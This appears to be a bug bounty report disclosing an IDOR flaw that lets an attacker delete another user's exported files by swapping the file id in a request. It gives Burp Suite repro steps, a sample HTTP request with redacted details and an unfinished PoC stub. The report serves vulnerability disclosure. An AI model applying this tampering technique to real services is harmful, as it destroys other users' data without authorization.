Description

In this case attacker is able to delete requested export data file

Steps to repro:- 1.Create 2 accounts 2.Login in both account and goto export section and create new export in both account 3.Delete acc1's exported file and capture this request in burp suite and change the id of this request to acc2's exported file id and forward the request

This bug required to know id of the file that's why i have set attack complexity to high

Sample Request

POST /api/fileOperations.delete HTTP/1.1
Host: HOST
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 45
Cache-Control: no-cache
Pragma: no-cache
X-Editor-Version: 12.0.0
Origin: Redacted
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Authorization: Bearer Redirected
Te: trailers
Connection: close

{"id":"victim's id"}
// PoC.js
var payload = ...

Impact

Using this bug attacker can delete backup file of any user. Also an attacker can be able to access whole project of a organization then it create \ a huge privacy issue to any organization. since it could be turn to huge information disclosure.